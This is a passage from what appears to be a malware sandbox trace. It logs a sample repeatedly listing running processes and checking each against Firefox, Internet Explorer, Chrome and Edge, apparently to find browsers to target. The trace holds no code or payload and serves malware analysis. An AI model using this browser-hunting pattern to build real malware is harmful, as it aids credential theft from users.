[0209.095] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0209.096] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0209.096] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0209.096] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0209.096] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.096] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0209.096] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0209.097] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0209.097] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0209.097] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0209.097] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0209.097] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0209.097] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0209.097] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.097] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0209.098] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0209.098] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0209.098] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0209.098] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0209.098] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0209.098] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0209.098] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0209.098] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.098] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0209.099] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0209.099] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0209.099] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0209.099] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0209.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0209.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0209.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0209.099] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.099] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0209.100] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0209.100] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0209.100] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0209.100] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.100] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0209.100] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0209.101] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0209.101] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0209.101] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0209.101] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0209.101] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0209.101] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0209.101] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.101] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0209.102] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0209.102] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0209.102] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0209.102] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0209.102] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0209.102] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0209.102] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0209.102] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.102] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.103] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0209.103] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0209.103] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0209.103] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.103] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.103] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.103] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.103] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.103] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0209.104] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0209.104] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0209.104] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0209.104] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.104] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.105] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.105] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.105] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.105] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0209.105] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0209.105] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0209.105] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0209.105] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.105] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0209.106] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0209.106] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0209.106] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0209.106] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.106] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0209.106] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0209.106] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0209.106] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.106] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0209.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0209.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0209.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0209.107] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0209.107] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0209.107] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0209.107] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0209.107] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0209.107] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.108] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0209.108] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.109] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.109] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0209.109] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0209.109] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0209.109] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.109] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0209.110] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0209.110] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0209.110] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0209.110] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0209.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0209.110] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0209.110] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0209.110] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0209.110] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0209.110] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0209.196] CloseHandle (hObject=0xd4) returned 1 [0209.196] Sleep (dwMilliseconds=0x3e8) [0210.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0210.333] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.333] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0210.333] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0210.333] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0210.333] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0210.333] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0210.334] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0210.334] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0210.334] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0210.334] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0210.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0210.334] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0210.334] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0210.334] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0210.334] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.334] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.335] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0210.335] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0210.335] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0210.335] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0210.335] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0210.335] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0210.335] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0210.335] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.335] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0210.336] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0210.336] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0210.336] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0210.336] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.336] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0210.337] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0210.337] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0210.337] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0210.337] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.337] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0210.337] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0210.337] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0210.337] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0210.337] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.337] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0210.338] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0210.338] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0210.338] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0210.338] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0210.338] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0210.338] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0210.338] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0210.338] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0210.338] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.339] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.339] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.340] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.340] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.340] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.340] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.340] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0210.341] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0210.341] Process32Next (in: 